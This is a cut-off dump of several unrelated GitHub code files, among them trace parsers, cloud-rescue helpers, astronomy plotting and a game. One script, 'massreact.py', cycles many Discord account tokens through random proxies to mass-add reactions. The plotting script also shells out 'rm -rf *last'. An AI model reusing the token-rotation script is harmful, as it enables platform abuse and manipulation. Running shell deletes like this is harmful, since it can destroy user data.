'Counter name'\n counter_events_by_name = defaultdict(EventList)\n counter_events_by_pid = defaultdict(lambda : counter_events_by_name)\n try:\n while True:\n event = (yield)\n pid = event.data.pid\n counter_name = event.data.counter_name\n event_list = counter_events_by_pid[pid][counter_name]\n if event_list:\n last_event = event_list.pop()\n last_timestamp = last_event.timestamp\n last_value = last_event.data.value\n event_list.append(event)\n interval = Interval(last_timestamp, event.timestamp)\n counter = Counter(pid=pid, name=counter_name, event=last_event,\n value=last_value, interval=interval)\n self._tmw_intervals_by_name[counter.name].append(counter)\n\n except GeneratorExit:\n # close things off\n for pid, by_name in counter_events_by_pid.iteritems():\n for counter_name, event_list in by_name.iteritems():\n for event in event_list:\n last_timestamp = event.timestamp\n last_value = event.data.value\n interval = Interval(last_timestamp, self._trace.duration)\n counter = Counter(pid=pid, name=counter_name, event=event,\n value=last_value, interval=interval)\n self._tmw_intervals_by_name[counter.name].append(counter)\n\n def _parse_tmw_events(self):\n \"\"\"Parse tracing_mark_write intervals\"\"\"\n context_handler = self._context_handler()\n async_event_handler = self._async_event_handler()\n counter_handler = self._counter_handler()\n\n _ATRACE_TAG_HANDLERS = {\n AtraceTag.CONTEXT_BEGIN : context_handler,\n AtraceTag.CONTEXT_END : context_handler,\n AtraceTag.ASYNC_BEGIN : async_event_handler,\n AtraceTag.ASYNC_END : async_event_handler,\n AtraceTag.COUNTER : counter_handler,\n }\n\n def tmw_events_gen():\n filter_func = lambda event: event.tracepoint == 'tracing_mark_write'\n for event in filter(filter_func, self._events):\n yield event\n\n for event in tmw_events_gen():\n try:\n handler_func = self.__event_handlers[event.data.atrace_tag]\n except KeyError:\n handler_func = \\\n self.__event_handlers[event.data.atrace_tag] = \\\n _ATRACE_TAG_HANDLERS[event.data.atrace_tag]\n # handler_func.next() # prime the coroutine\n except AttributeError:\n log.warn(\"Unsupported event: {event}\".format(event=event))\n continue\n handler_func.send(event)\n\n # shut down the coroutines (..and we are done!)\n for handler_func in self.__event_handlers.itervalues():\n handler_func.close()","repo_name":"corakwue/ftrace","sub_path":"ftrace/components/android.py","file_name":"android.py","file_ext":"py","file_size_in_byte":27991,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"53"} +{"seq_id":"27926739354","text":"from gce_rescue.config import get_config\nfrom gce_rescue.tasks.keeper import wait_for_operation, wait_for_os_boot\nfrom typing import Dict\nimport logging\n\n_logger = logging.getLogger(__name__)\n\ndef set_metadata(vm) -> Dict:\n \"\"\"Configure Instance custom metadata.\n https://cloud.google.com/compute/docs/reference/rest/v1/instances/setMetadata\n a. Set rescue-mode= if disable=False\n b. Delete rescue-mode if disable=True\n c. Replace startup-script with local startup-script.sh content.\"\"\"\n\n startup_script_file = get_config('startup-script-file')\n device_name = vm.disks['device_name']\n with open(startup_script_file, encoding='utf-8') as file:\n file_content = file.read()\n file_content = file_content.replace('GOOGLE_DISK_NAME', device_name)\n file_content = file_content.replace('GOOGLE_TS', str(vm.ts))\n\n metadata_body = {\n 'fingerprint': vm.data['metadata']['fingerprint'],\n 'items': [{\n 'key': 'startup-script',\n 'value': file_content\n }]\n }\n _logger.info('Setting custom metadata...')\n\n operation = vm.compute.instances().setMetadata(\n **vm.project_data,\n instance = vm.name,\n body = metadata_body).execute()\n\n result = wait_for_operation(vm, oper=operation)\n return result\n\n\ndef restore_metadata_items(vm, remove_rescue_mode: bool = False) -> Dict:\n \"\"\"Restore original metadata.items after the instance is running again.\"\"\"\n\n vm.refresh_fingerprint()\n\n if not remove_rescue_mode:\n vm.backup_items.append({ 'key': 'rescue-mode', 'value': vm.ts })\n else:\n vm.backup_items.remove({ 'key': 'rescue-mode', 'value': vm.ts })\n\n metadata_body = {\n 'fingerprint': vm.data['metadata']['fingerprint'],\n 'items': vm.backup_items\n }\n _logger.info('Restoring original metadata...')\n\n # gce-rescue/issues/21 - continue after wait period timed out\n if not remove_rescue_mode:\n wait_for_os_boot(vm)\n\n operation = vm.compute.instances().setMetadata(\n **vm.project_data,\n instance = vm.name,\n body = metadata_body).execute()\n result = wait_for_operation(vm, oper=operation)\n return result\n","repo_name":"GoogleCloudPlatform/gce-rescue","sub_path":"gce_rescue/tasks/metadata.py","file_name":"metadata.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"53"} +{"seq_id":"43670026182","text":"import unittest\nimport os\nfrom lib.FileManager import FileManager\nfrom lib.Spirit import Spirit\n\n\nclass FileManagerTestCase(unittest.TestCase):\n def test_unpack_inverts_output_list(self):\n test_list = [\"x\", \"y\", \"z\"]\n FileManager.output_list_to_text_file(test_list, \"tests\")\n actual_list = FileManager.unpack_text_to_python_list(\"tests/url_list.text\")\n self.assertEqual([\"x\", \"y\", \"z\"], actual_list)\n os.remove(\"tests/url_list.text\")\n\n def test_unpack_inverts_output_json(self):\n test_spirit = Spirit()\n test_spirit.name = \"test\"\n test_spirit.brand_name = \"test\"\n test_spirit.subname = \"test\"\n test_spirit.product_id = \"test\"\n test_spirit.product_uuid = \"test\"\n test_spirit.contents_liquid_volume = \"70cl\"\n test_spirit.alcohol_by_volume = \"40%\"\n test_spirit.price = 50\n test_spirit.description = \"tasteless\"\n test_spirit.facts = {\"x\": 1, \"y\": 2, \"z\": 3}\n test_spirit.flavour_style = {\"x\": 1, \"y\": 2, \"z\": 3}\n test_spirit.flavour_character = [\"x\", \"y\", \"z\"]\n test_spirit.filepath = \"tests\"\n expected_dict = test_spirit.__dict__\n\n FileManager.output_spirit_to_data_file(test_spirit, \"\")\n actual_dict = FileManager.unpack_json_file(\"tests/data.json\")\n\n self.assertDictEqual(expected_dict, actual_dict)\n os.remove(\"tests/data.json\")\n\n\nunittest.main(argv=[\"\"], verbosity=3, exit=False)\n","repo_name":"conorcarrion/Data-Collection-Pipeline","sub_path":"test_FileManager.py","file_name":"test_FileManager.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16949898454","text":"import os\nimport re\nimport sys\nimport glob\nimport scipy\nimport numpy as np\nimport matplotlib.cm as cm\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport matplotlib.patches as mpatches\nplt.ioff()\n\n\n#####################\n### Parameter\n#####################\ndir_proj = \"/Users/saito/data/myproj_active/proj_ts10_phangs_ulirgs/data/\"\ndir_eps = \"/Users/saito/data/myproj_active/proj_ts10_phangs_ulirgs/eps/\"\ngalaxy = ['eso267','eso297g011','eso297g012','eso319','eso507','eso557','ic4518e','ic4518w','ic5179','iras06592','irasf10409','irasf17138','mcg02','ngc1614','ngc2369','ngc3110','ngc3256','ngc5257','ngc6240']\nphangs = [s.split(\"/\")[-1].split(\"_12m\")[0] for s in glob.glob(dir_eps + \"../data_phangs/*mom0*\")]\nylim = [0.1,100]\n\ngalname1 = [s.replace(\"eso\",\"ESO \").replace(\"ngc\",\"NGC \").replace(\"mcg\",\"MCG-\") for s in galaxy]\ngalname2 = [s.replace(\"e\",\"E\").replace(\"w\",\"W\").replace(\"ic\",\"IC\") for s in galname1]\ngalname3 = [s.replace(\"iras\",\"IRAS \").replace(\"f\",\"F\").replace(\"g\",\"-G\") for s in galname2]\ngalname4 = [s.replace(\"319\",\"319-G022\").replace(\"507\",\"507-G070\") for s in galname3]\ngalname5 = [s.replace(\"557\",\"557-G002\").replace(\"06592\",\"06592-6313\") for s in galname4]\ngalname6 = [s.replace(\"10409\",\"10409-4556\").replace(\"17138\",\"17138-1017\") for s in galname5]\ngalname = [s.replace(\"mcg02\",\"mcg-02-33-098\").replace(\"267\",\"267-G030\") for s in galname6]\n\n\n#####################\n### def\n#####################\ndef deltaMS(sfr,mass):\n\tlog_sfr_ms = (-0.32*(np.log10(mass)-np.log10(10**10))-10.17) + np.log10(mass)\n\t#ms_offset = np.log10(sfr) - log_sfr_ms\n\tms_offset = sfr / 10**log_sfr_ms\n\n\treturn ms_offset\n\n\n#####################\n### Main Procedure\n#####################\n###\ndata = np.loadtxt(\"list_sfr_stellar.txt\", dtype=\"str\")\nlirg_name = data[:,0]\nlirg_logSFR = 10**data[:,1].astype(\"float64\")\nlirg_logMstar = 10**data[:,2].astype(\"float64\")\n#\nhdu_list = fits.open(dir_eps + \"../data_other/phangs_sample_table_v1p5.fits\", memmap=True)\nevt_data = Table(hdu_list[1].data)\nphangs_name = evt_data[\"name\"]\nphangs_logSFR = evt_data[\"props_sfr\"] # np.log10(evt_data[\"props_sfr\"])\nphangs_logMstar = evt_data[\"props_mstar\"] # np.log10(evt_data[\"props_mstar\"])\n\n\n###\nlist_all = []\nfor i in range(len(galaxy)):\n#for i in [0]:\n\tthis_galaxy = galaxy[i]\n\tprint(\"# working on \" + this_galaxy)\n\t# get image\n\tthis_mom0 = glob.glob(dir_proj + this_galaxy + \"*_mom0.fits\")[0]\n\t# get box\n\tthis_header = imhead(this_mom0,mode=\"list\")\n\tshape = this_header[\"shape\"]\n\tbox = \"0,0,\" + str(shape[0]-1) + \",\" + str(shape[1]-1)\n\t# pixel size in parsec\n\tthis_scale = 150/this_header[\"beammajor\"][\"value\"]\n\tpixsize = abs(this_header[\"cdelt1\"])*3600*180/np.pi * this_scale / 1000.\n\tpixarea = pixsize**2\n\t# galarea in kpc^2\n\tthis_data = imval(this_mom0, box=box)\n\tgalarea = sum(this_data[\"mask\"].flatten()) * pixarea\n\tradius = np.sqrt(galarea / np.pi)\n\t# get pturb\n\tdata = np.loadtxt(\"list_pturb.txt\", dtype=\"str\")\n\tthis_pturb = data[data[:,0]==this_galaxy][:,1:]\n\t# get virial\n\tdata = np.loadtxt(\"list_virial.txt\", dtype=\"str\")\n\tthis_virial = data[data[:,0]==this_galaxy][:,1:]\n\t#\n\tindex = np.where(lirg_name==this_galaxy)[0]\n\tif index:\n\t\tindex = index[0]\n\t\tstellarmass = lirg_logMstar[index]\n\t\tsfr = lirg_logSFR[index]\n\telse:\n\t\tstellarmass = 0\n\t\tsfr = 0\n\t# combine list\n\tthis_list = np.c_[np.array(this_galaxy),radius,this_pturb,this_virial,stellarmass,sfr][0]\n\tlist_all.append(this_list.tolist())\n\t#\nlist_all = np.array(list_all)\nlist_all = list_all[list_all[:,1].argsort()]\nlist_name = list_all[:,0]\nlist_r = list_all[:,1].astype(\"float64\")\nlist_pturb = list_all[:,2:6].astype(\"float64\")\nlist_virial = list_all[:,6:10].astype(\"float64\")\nlist_mass = list_all[:,10].astype(\"float64\")\nlist_sfr = list_all[:,11].astype(\"float64\")\nlist_delta = deltaMS(list_sfr,list_mass)\n\n\n###\nphangs_all = []\nfor i in range(len(phangs)):\n#for i in [0]:\n\tthis_galaxy = phangs[i]\n\tprint(\"# working on \" + this_galaxy)\n\t# get image\n\tthis_mom0 = glob.glob(dir_proj + \"../data_phangs/\" + this_galaxy + \"*_mom0_150pc.fits\")[0]\n\t# get box\n\tthis_header = imhead(this_mom0,mode=\"list\")\n\tshape = this_header[\"shape\"]\n\tbox = \"0,0,\" + str(shape[0]-1) + \",\" + str(shape[1]-1)\n\t# pixel size in parsec\n\tthis_scale = 150/this_header[\"beammajor\"][\"value\"]\n\tpixsize = abs(this_header[\"cdelt1\"])*3600*180/np.pi * this_scale / 1000.\n\tpixarea = pixsize**2\n\t# galarea in kpc^2\n\tthis_data = imval(this_mom0, box=box)\n\tgalarea = sum(this_data[\"mask\"].flatten()) * pixarea\n\tradius = np.sqrt(galarea / np.pi)\n\t# get pturb\n\tdata = np.loadtxt(\"list_pturb_phangs.txt\", dtype=\"str\")\n\tthis_pturb = data[data[:,0]==this_galaxy][:,1:]\n\t# get virial\n\tdata = np.loadtxt(\"list_virial_phangs.txt\", dtype=\"str\")\n\tthis_virial = data[data[:,0]==this_galaxy][:,1:]\n\t#\n\tindex = np.where(phangs_name==this_galaxy)[0][0]\n\tstellarmass = phangs_logMstar[index]\n\tsfr = phangs_logSFR[index]\n\t# combine list\n\tthis_list = np.c_[np.array(this_galaxy),radius,this_pturb,this_virial,stellarmass,sfr][0]\n\tphangs_all.append(this_list.tolist())\n\t#\nphangs_all = np.array(phangs_all)\nphangs_all = phangs_all[phangs_all[:,1].argsort()]\nphangs_name = phangs_all[:,0]\nphangs_r = phangs_all[:,1].astype(\"float64\")\nphangs_pturb = phangs_all[:,2:5].astype(\"float64\")\nphangs_virial = phangs_all[:,5:8].astype(\"float64\")\nphangs_mass = phangs_all[:,8].astype(\"float64\")\nphangs_sfr = phangs_all[:,9].astype(\"float64\")\nphangs_delta = deltaMS(phangs_sfr,phangs_mass)\n\n\n# plot\nfigure = plt.figure(figsize=(5,3))\ngs = gridspec.GridSpec(nrows=9, ncols=9)\nax = plt.subplot(gs[0:9,0:7])\nplt.rcParams[\"font.size\"] = 10\nplt.rcParams[\"legend.fontsize\"] = 8\nplt.subplots_adjust(bottom=0.15, left=0.15, right=0.95, top=0.95)\n#\nax.scatter(phangs_mass, phangs_pturb[:,1], s=10, marker=\"o\", c=\"white\", lw=1, edgecolors=\"skyblue\", zorder=1e9, label=\"PHANGS\")\n#\nax.scatter(list_mass, list_pturb[:,1], s=20, marker=\"s\", c=\"white\", lw=1, edgecolors=\"indianred\", zorder=1e9, label=\"(U)LIRGs\")\nax.scatter(list_mass, list_pturb[:,3], s=40, marker=\"*\", c=\"white\", lw=1, edgecolors=\"indianred\", zorder=1e9, label=\"(U)LIRG centers\")\n#for i in range(len(galaxy)):\n# ax.plot([list_r[i], list_r[i]], [list_pturb[i,0], list_pturb[i,2]], lw=1, c=\"indianred\")\n#\nplt.xscale(\"log\")\nplt.yscale(\"log\")\nplt.xlim([10**8.9,10**12])\nplt.ylim([10**2.1,10**9.2])\nplt.xlabel(r\"log $M_{\\star}$ ($M_{\\odot}$)\")\nplt.ylabel(r\"log $P_{\\mathsf{turb,150pc}}$ (K cm$^{-3}$)\")\nplt.xticks([10**9,10**10,10**11],[9,10,11])\nplt.yticks([10**3,10**4,10**5,10**6,10**7,10**8,10**9],[3,4,5,6,7,8,9])\nplt.savefig(dir_eps+\"plot_mass_pturb.png\",dpi=200)\n\n# plot\ncut_phangs = np.where((phangs_mass>10**10.3) & (phangs_mass<10**11.1))\ncut_lirg = np.where((list_mass>10**10.3) & (list_mass<10**11.1))\n#\nfigure = plt.figure(figsize=(5,3))\ngs = gridspec.GridSpec(nrows=9, ncols=9)\nax = plt.subplot(gs[0:9,0:7])\nplt.rcParams[\"font.size\"] = 10\nplt.rcParams[\"legend.fontsize\"] = 8\nplt.subplots_adjust(bottom=0.15, left=0.15, right=0.95, top=0.95)\n#\nax.scatter(phangs_delta[cut_phangs], phangs_pturb[:,1][cut_phangs], s=10, marker=\"o\", c=\"white\", lw=1, edgecolors=\"skyblue\", zorder=1e9, label=\"PHANGS\")\n#\nax.scatter(list_delta[cut_lirg], list_pturb[:,1][cut_lirg], s=20, marker=\"s\", c=\"white\", lw=1, edgecolors=\"indianred\", zorder=1e9, label=\"(U)LIRGs\")\nax.scatter(list_delta[cut_lirg], list_pturb[:,3][cut_lirg], s=40, marker=\"*\", c=\"white\", lw=1, edgecolors=\"indianred\", zorder=1e9, label=\"(U)LIRG centers\")\n#for i in range(len(galaxy)):\n# ax.plot([list_r[i], list_r[i]], [list_pturb[i,0], list_pturb[i,2]], lw=1, c=\"indianred\")\n#\nplt.xscale(\"log\")\nplt.yscale(\"log\")\nax.set_xlim([10**-1.1,10**1.5])\nplt.ylim([10**2.1,10**9.2])\nplt.xlabel(r\"log $\\Delta_{\\mathsf{MS}}$\")\nplt.ylabel(r\"log $P_{\\mathsf{turb,150pc}}$ (K cm$^{-3}$)\")\nplt.xticks([10**-1,10**0,10**1],[-1,0,1])\nplt.yticks([10**3,10**4,10**5,10**6,10**7,10**8,10**9],[3,4,5,6,7,8,9])\nax.text(10**-1,10**8,\"Mass-selected sample \\n(10.3 < log $M_{\\star}$ < 11.1)\")\nplt.savefig(dir_eps+\"plot_deltams_pturb.png\",dpi=200)\n\n\n# plot\nfigure = plt.figure(figsize=(5,3))\ngs = gridspec.GridSpec(nrows=9, ncols=9)\nax = plt.subplot(gs[0:9,0:7])\nplt.rcParams[\"font.size\"] = 10\nplt.rcParams[\"legend.fontsize\"] = 10\nplt.subplots_adjust(bottom=0.15, left=0.15, right=0.95, top=0.95)\n#\nax.scatter(phangs_mass, phangs_virial[:,1], s=10, marker=\"o\", c=\"white\", lw=1, edgecolors=\"skyblue\", zorder=1e9)\n#\nax.scatter(list_mass, list_virial[:,1], s=20, marker=\"s\", c=\"white\", lw=1, edgecolors=\"indianred\", zorder=1e9)\nax.scatter(list_mass, list_virial[:,3], s=40, marker=\"*\", c=\"white\", lw=1, edgecolors=\"indianred\", zorder=1e9)\n#for i in range(len(galaxy)):\n# ax.plot([list_r[i], list_r[i]], [list_pturb[i,0], list_pturb[i,2]], lw=1, c=\"indianred\")\n#\nplt.xscale(\"log\")\nplt.yscale(\"log\")\nplt.xlim([10**8.9,10**12])\nplt.ylim([1.5,40])\nplt.xlabel(r\"log $M_{\\star}$ ($M_{\\odot}$)\")\nplt.ylabel(r\"log $\\alpha_{\\mathsf{vir,150pc}}$\")\nplt.xticks([10**9,10**10,10**11],[9,10,11])\nplt.yticks([10**np.log10(3),10**1,10**np.log10(30)],[3,10,30])\nplt.savefig(dir_eps+\"plot_mass_virial.png\",dpi=200)\n\n# plot\nfigure = plt.figure(figsize=(5,3))\ngs = gridspec.GridSpec(nrows=9, ncols=9)\nax = plt.subplot(gs[0:9,0:7])\nplt.rcParams[\"font.size\"] = 10\nplt.rcParams[\"legend.fontsize\"] = 8\nplt.subplots_adjust(bottom=0.15, left=0.15, right=0.95, top=0.95)\n#\nax.scatter(phangs_delta[cut_phangs], phangs_virial[:,1][cut_phangs], s=10, marker=\"o\", c=\"white\", lw=1, edgecolors=\"skyblue\", zorder=1e9, label=\"PHANGS\")\n#\nax.scatter(list_delta[cut_lirg], list_virial[:,1][cut_lirg], s=20, marker=\"s\", c=\"white\", lw=1, edgecolors=\"indianred\", zorder=1e9, label=\"(U)LIRGs\")\nax.scatter(list_delta[cut_lirg], list_virial[:,3][cut_lirg], s=40, marker=\"*\", c=\"white\", lw=1, edgecolors=\"indianred\", zorder=1e9, label=\"(U)LIRG centers\")\n#for i in range(len(galaxy)):\n# ax.plot([list_r[i], list_r[i]], [list_pturb[i,0], list_pturb[i,2]], lw=1, c=\"indianred\")\n#\nplt.xscale(\"log\")\nplt.yscale(\"log\")\nax.set_xlim([10**-1.1,10**1.5])\nplt.ylim([1.5,40])\nplt.xlabel(r\"log $\\Delta_{\\mathsf{MS}}$\")\nplt.ylabel(r\"log $\\alpha_{\\mathsf{vir,150pc}}$\")\nplt.xticks([10**-1,10**0,10**1],[-1,0,1])\nplt.yticks([10**np.log10(3),10**1,10**np.log10(30)],[3,10,30])\nax.text(10**-1,23,\"Mass-selected sample \\n(10.3 < log $M_{\\star}$ < 11.1)\")\nplt.savefig(dir_eps+\"plot_deltams_virial.png\",dpi=200)\n\n\n#\nos.system(\"rm -rf *last\")\n","repo_name":"toshikisaito1005/mycasa_scripts","sub_path":"mycasa_scripts_active/scripts_ts10_phangs_ulirg/fig06_stellarmass_vs_gmc.py","file_name":"fig06_stellarmass_vs_gmc.py","file_ext":"py","file_size_in_byte":10265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70506281129","text":"import requests\r\nimport random\r\n\r\ndef read_from_file(filename):\r\n with open(filename, 'r') as file:\r\n return file.read().strip().split('\\n')\r\n\r\ndef send_request_with_proxy(token, proxy, cookie, xsp, refer, messageid, guildid):\r\n url = \"https://discord.com/api/v9/channels/\" + guildid + \"/messages/\" + messageid + \"/reactions/%E2%9C%85/%40me?location=Message&type=0\"\r\n headers = {\r\n \"accept\": \"*/*\",\r\n \"accept-language\": \"de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7\",\r\n \"authorization\": token,\r\n \"sec-fetch-dest\": \"empty\",\r\n \"sec-fetch-mode\": \"cors\",\r\n \"sec-fetch-site\": \"same-origin\",\r\n \"x-debug-options\": \"bugReporterEnabled\",\r\n \"x-discord-locale\": \"de\",\r\n \"x-discord-timezone\": \"Europe/Berlin\",\r\n \"x-super-properties\": xsp,\r\n \"cookie\": cookie,\r\n \"Referer\": refer,\r\n \"Referrer-Policy\": \"strict-origin-when-cross-origin\"\r\n }\r\n try:\r\n response = requests.get(url, headers=headers, proxies=proxy)\r\n print(f\"Token: {token}, Status Code: {response.status_code}\")\r\n except requests.exceptions.RequestException as e:\r\n print(f\"Token: {token}, Error: {e}\")\r\n\r\ndef main():\r\n token_file = input(\"Token file>>>\")\r\n proxy_file = input(\"Proxy file>>>\")\r\n guildiddsc = input(\"GuildID>>>\")\r\n msgiddsc = input(\"MessageID>>>\")\r\n cookiedsc = input(\"cookie>>>\")\r\n xspdsc = input(\"XSP>>>\")\r\n referdsc = input(\"Referer>>>\")\r\n tokens = read_from_file(token_file)\r\n proxies = read_from_file(proxy_file)\r\n\r\n proxy_list = [proxy.strip() for proxy in proxies]\r\n\r\n for token in tokens:\r\n proxy = random.choice(proxies)\r\n send_request_with_proxy(token, proxy, cookiedsc, xspdsc, referdsc, msgiddsc, guildiddsc)\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"dvlq/discord-tools","sub_path":"massreact/massreact.py","file_name":"massreact.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38083735460","text":"# Tuple Methods.\n\n# There is no direct method to operate on tuple. First we have to change the tuple to list. Then perform operations on list and after that convert that list to a tuple.\n\nnumbers = (1, 2, 3, 4, 5, 6, 7, 8, 9)\n\nnum = list(numbers)\nnum.append(10)\nnum.reverse()\nnum[0] = 0\nnumbers = tuple(num)\nprint(numbers)\n\n# There are some methods that we can apply to tuple.\n\n# Will return the no. of occurence of given number.\nnumbers.count(6)\n\n# Will return first occurence of given number.\nnumbers.index(4)\n","repo_name":"Himanshu22Soni/100-Days-Code-Python","sub_path":"Day 25.py","file_name":"Day 25.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10663260807","text":"\"\"\"File Class Definition for Mpala Tower Metadata.\"\"\"\nfrom . import db, DATA_FILES\nfrom variable import Variable\nimport xarray\nimport requests\n\nprogram_location = 'programs'\n\ndef convert_to_sec(num, units):\n \"\"\"Convert time units to seconds.\"\"\"\n if units.startswith(('Min', 'min')):\n out = int(num) * 60\n elif units.startswith(('ms', 'mS')):\n out = float(num) / 1000\n elif units.startswith(('s', 'S')):\n out = int(num)\n else:\n print('couldn\\'t parse units')\n return (num, units)\n return out\n\n\n# Files contained within Metadata:\nclass File(db.DynamicEmbeddedDocument):\n \"\"\"File object model defined for use in MongoEngine.\"\"\"\n\n source = db.StringField()\n logger = db.StringField()\n datafile = db.StringField(\n # choices=DATA_FILES\n )\n filename = db.StringField()\n frequency = db.FloatField()\n frequency_flag = db.StringField()\n timestep_count = db.IntField()\n date = db.DateTimeField()\n program_name = db.StringField()\n program_location = db.StringField()\n\n # Where to find the datalogger output for this file.\n # We read this file to find and analyze variables.\n file_location = db.StringField()\n\n # The File object contains a list of Variables:\n variables = db.EmbeddedDocumentListField(Variable)\n\n def get_program(self):\n \"\"\"Retrieve a program file from the Mpala Tower Dropbox listings.\"\"\"\n # Must use Dropbox to get program files.\n from dropbox import Dropbox\n from posixpath import join\n import os\n\n # Set up the Dropbox connection. Not sure how access_tokens will work\n access_token = os.environ.get('access_token')\n dropbox_dir = os.environ.get('dropbox_dir')\n client = Dropbox(access_token)\n\n # If this is our first time with this file, set the program name and\n # location.\n self.program_location = join(\n dropbox_dir,\n program_location,\n self.program_name\n )\n # Retrieve the REST object from Dropbox\n prog_link = client.files_get_temporary_link(self.program_location)\n response = requests.get(prog_link.link)\n # Put the program file contents into an array for parsing\n program_content = response.text\n # Send that stuff back.\n return program_content\n\n @staticmethod\n def get_programmed_frequency(program_content=None, datafile=None):\n \"\"\"Determine the frequency of data collection from the program file.\"\"\"\n lines = program_content\n i = 0\n k = 0\n interval = None\n dt = 'DataTable'\n di = 'DataInterval'\n ct = 'CallTable'\n for i in range(len(lines)):\n line = lines[i].lstrip()\n if line.startswith(dt) and datafile in line:\n k = i\n if line.startswith(di) and i <= (k + 2):\n interval = line.split(',')[1]\n units = line.split(',')[2]\n i += 1\n if interval is None:\n i = 0\n for i in range(len(lines)):\n line = lines[i].lstrip()\n if line.startswith('Scan'):\n interval_temp = line.split('(')[1].split(',')[0]\n units_temp = line.split(',')[1]\n k = i\n if line.startswith(ct) and datafile in line and i <= (k + 7):\n interval = interval_temp\n units = units_temp\n i += 1\n if interval is None:\n frequency_flag = 'could not find program interval'\n frequency = float('nan')\n timestep_count = int(0)\n return [frequency, frequency_flag, timestep_count]\n try:\n num = int(interval)\n except:\n for l in lines:\n line = l.lstrip()\n if line.startswith('Const ' + interval):\n a = line.split('=')[1]\n b = a.split()[0]\n num = int(b)\n frequency = convert_to_sec(num, units)\n timestep_count = int(24. * 60. * 60. / frequency)\n frequency_flag = 'found frequency'\n return [frequency, frequency_flag, timestep_count]\n\n @staticmethod\n def process_netcdf(netcdf=None):\n \"\"\"Process a netCDF file into a dataframe and summary.\"\"\"\n from . import static_attrs\n\n ds = xarray.Dataset()\n ds = xarray.open_dataset(\n netcdf,\n decode_cf=True,\n decode_times=True\n )\n df = ds.to_dataframe()\n\n # drop from df, columns that don't change with time\n exclude = [var for var in static_attrs if var in df.columns]\n df_var = df.drop(exclude, axis=1) # dropping vars like lat, lon\n\n # get some descriptive statistics on each of the variables\n df_summ = df_var.describe()\n return ds, df_summ\n\n def parse(self):\n \"\"\"Parse a netcdf file to extract metadata information.\"\"\"\n ds, df_summ = self.process_netcdf(netcdf=self.file_location)\n self.source = ds.attrs['source']\n self.logger = ds.attrs['logger']\n self.program_name = ds.attrs['program']\n self.datafile = ds.attrs['datafile']\n program_content = self.get_program()\n [\n self.frequency,\n self.frequency_flag,\n self.timestep_count\n ] = self.get_programmed_frequency(\n program_content=program_content,\n datafile=self.datafile,\n )\n for var in df_summ:\n self.variables.append(\n Variable.generate_variable(\n var=var,\n ds=ds[var],\n df=df_summ[var],\n ts=self.timestep_count\n )\n )\n return self\n\n @staticmethod\n def generate_fake():\n \"\"\"Generate a fake File object for testing and development.\"\"\"\n from random import choice\n from faker import Faker\n fake = Faker()\n this_file = File(\n datafile=choice(DATA_FILES),\n source=fake.word(),\n logger=fake.word(),\n filename=fake.word(),\n frequency=choice([.1, 60, 600, 1800]),\n variables=[Variable.generate_fake() for i in range(1, 10)]\n )\n return this_file\n","repo_name":"kcaylor/tower_metadata","sub_path":"app/models/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":6340,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"12525348859","text":"# given a target amount n and a list of distinct coin values, \n# whats the fewest coins needed to make the change amount\ndef coin_rec(target, coins):\n \n min_coins = target\n\n if target in coins:\n return 1\n \n else:\n # for every coin value that is <= my target value\n for i in coins:\n if i <= target:\n # add a coin count + recursive call\n num_coins = 1 + coin_rec(target-i, coins)\n if num_coins < min_coins:\n min_coins = num_coins\n \n\n return min_coins\n \n\nprint(coin_rec(13,[1,5, 10])) #=> 1","repo_name":"daniel19e/dsa_practice","sub_path":"recursion/coin_change.py","file_name":"coin_change.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20153572734","text":"import pygame\nfrom components.gui import draw_around_surface\n\npygame.mixer.pre_init(44100, 16, 2, 4096)\npygame.init()\n\nWIDTH, HEIGHT = 960, 560\n\nFPS = 30\n\n# general colours\nBLACK = ( 0, 0, 0)\nWHITE = (255, 255, 255)\nRED = (211, 0, 0)\nGREEN = ( 0, 150, 0)\nDGREEN = ( 0, 100, 0)\nBLUE = ( 0, 0, 211)\nLBLUE = (137, 207, 240)\nGREY = (201, 201, 201)\nLGREY = (231, 231, 231)\nDGREY = ( 50, 50, 50)\nLBROWN = (185, 122, 87)\nDBROWN = (159, 100, 64)\n\n# display window that is drawn to\nWIN = pygame.display.set_mode((WIDTH, HEIGHT))\npygame.display.set_caption(\"Time platformer\")\n\n# fonts\nFONT = lambda x: pygame.font.SysFont(\"consolas.ttf\", x)\nTITLEFONT = FONT(70)\n\n# tile property/ies\nTILE_SIZE = 40\n\n# file locations\nfrom os import path\nPATH_TO_ATLAS_IMAGE = path.join(\"assets\", \"images\", \"atlas.bmp\")\nPATH_TO_LEVELS = path.join(\"assets\", \"levels\", \"levels\")\n\n# handles all updates to the window\ndef draw(WIN, state, tile_space, debug_mode, texture_atlas, selected_texture, show_commands, player):\n # create blank canvas\n WIN.fill(BLACK)\n \n # draws the tile_space\n tile_space.draw(WIN)\n \n player.draw(WIN)\n \n # extra tools for the dev\n if debug_mode == True:\n text = FONT(20).render(state.get_state(), 1, WHITE)\n WIN.blit(text, (0, 0))\n \n # draw which \n if state.get_state() == \"editor mode\":\n \n # draws the box around the image\n border_width = 5\n padding = 10\n x = WIDTH - TILE_SIZE - border_width*2 - padding\n y = padding\n container = pygame.Rect(x, y, TILE_SIZE + border_width*2, TILE_SIZE + border_width*2)\n pygame.draw.rect(WIN, RED, container, border_width)\n \n # draws the texture selected inside the box\n if selected_texture != \"delete\":\n image = texture_atlas.get_texture(selected_texture)\n WIN.blit(image, (x + border_width, y + border_width))\n else:\n image = texture_atlas.get_texture(\"empty\")\n WIN.blit(image, (x + border_width, 